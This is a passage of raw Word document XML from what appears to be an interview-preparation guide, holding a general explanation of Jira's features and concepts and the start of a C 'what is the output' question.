          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on your needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE32FF8" w14:textId="5A13592F" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6CB4404A">
          <v:rect id="_x0000_i3583" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932AC95" w14:textId="17450860" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="004B26C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEE32B" w14:textId="14655F5F" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="004B26C3" w:rsidP="004B26C3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="883" w:name="_Toc196308363"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Other</w:t>
      </w:r>
      <w:r w:rsidR="00204141" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="883"/>
    </w:p>
    <w:p w14:paraId="53B0FFD5" w14:textId="77777777" w:rsidR="001233E2" w:rsidRPr="00CE4B95" w:rsidRDefault="001233E2" w:rsidP="001233E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EDB6FF" w14:textId="09B3A8CD" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="00571FE1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="884" w:name="_Toc196308364"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Jira</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="884"/>
    </w:p>
    <w:p w14:paraId="1562ABC0" w14:textId="11656F02" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Jira</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a popular project management and issue tracking tool developed by Atlassian. It is primarily used for tracking bugs, tasks, and project management in software development environments, but it can be adapted for other types of projects as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05639994" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Here’s a breakdown of Jira’s features and uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907786A" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA35673" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Issue Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B382862" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Jira helps in tracking bugs, user stories, tasks, and other types of work items (known as "issues").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247210B1" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Each issue has a lifecycle with states such as "To Do", "In Progress", "Done", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72F04" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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roject Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D388B1" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Jira allows teams to manage projects with detailed tracking. You can create projects for different teams or workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352FB8C8" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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t supports Agile methodologies (Scrum, Kanban) for managing development sprints, workflows, and backlogs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D09944" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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gile Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1794798E" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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crum boards</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for sprint planning and backlog grooming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36080ABD" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Kanban boards</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for continuous workflow management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D90D072" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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print and release management features, with detailed burndown charts and velocity tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679992CF" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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ustomization</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1F089" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Jira is highly customizable. You can create custom workflows, issue types, fields, and screens to adapt the tool to your team’s specific processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24956960" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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ollaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F844CB" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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eams can collaborate through comments, attachments, and issue tracking, making it easier to communicate and resolve issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5973ED12" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Reporting and Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5AB6C3" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Jira provides detailed reporting and insights into the team's performance and project status, such as burndown charts, velocity charts, and release reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66222DE8" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4847F9AB" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Jira integrates with various tools like Confluence (for documentation), Bitbucket (for version control), Slack, GitHub, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41ED8A" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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ermissions and Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5842877F" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Jira allows granular control over permissions, so you can set who can view, edit, or transition issues. This ensures proper access control and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54EE1A" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Common Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F228D" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Bug Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira is often used by development teams to report, track, and resolve software bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151D6387" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Task Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Teams can create tasks, assign them to team members, and track progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FDF87" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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gile Project Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using Scrum or Kanban boards, Jira helps Agile teams manage sprints, track progress, and visualize workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEFB55" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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ustomer Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some teams use Jira for managing customer support tickets, ensuring quick resolution and better visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECDC0D" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Basic Concepts in Jira:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C28F0D" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every work item in Jira is referred to as an "issue," which could be a bug, task, feature, or user story.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6C5A2" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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rojects</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira allows you to create projects that define the type of work being tracked, such as software development or support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08B583" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Workflows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Customizable workflows define the lifecycle of an issue, e.g., from "To Do" to "Done."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58283E60" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Boards</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Visual representations of issues (Scrum or Kanban boards) to track progress and statuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEDD646" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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prints</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Agile sprints are used for planning short, time-boxed periods in which work is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141F666" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Epics and Stories</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Epics are large features or work units, while stories represent smaller, actionable pieces of work that can be completed in a sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A967F05" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Advantages of Using Jira:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93C61A" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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entralized Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Everything from tasks to bugs to user stories can be tracked in one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62237A68" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Team Collaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It facilitates communication between team members, leading to faster issue resolution and better coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BD302" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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lastRenderedPageBreak/>
        <w:t>Agile and Scrum Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira supports Agile methodologies, making it an excellent choice for teams following Scrum or Kanban.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747AA46D" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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ustomizable and Scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira is flexible enough for different types of projects, from small teams to large enterprises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002EC5A" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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omprehensive Reporting</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With built-in reports, teams can assess their progress and performance over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31EAD3" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="00564460"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A67FC" w14:textId="77777777" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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Jira is a powerful and flexible tool widely used in software development and project management. Its capability to manage workflows, integrate with other tools, and provide visibility into project health makes it essential for many teams following Agile methodologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F317B37" w14:textId="270FBCF9" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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6B7FF610">
          <v:rect id="_x0000_i3584" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="504CD394" w14:textId="74E38F56" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="000C4AEC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="885" w:name="_Toc196308365"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output of below program</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="885"/>
    </w:p>
    <w:p w14:paraId="36A10444" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D734D" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD3F92" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C7B69" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C74DE7" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</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1</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1</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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0459D4" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>a</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a</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a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a</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a</w:t>
      </w:r>
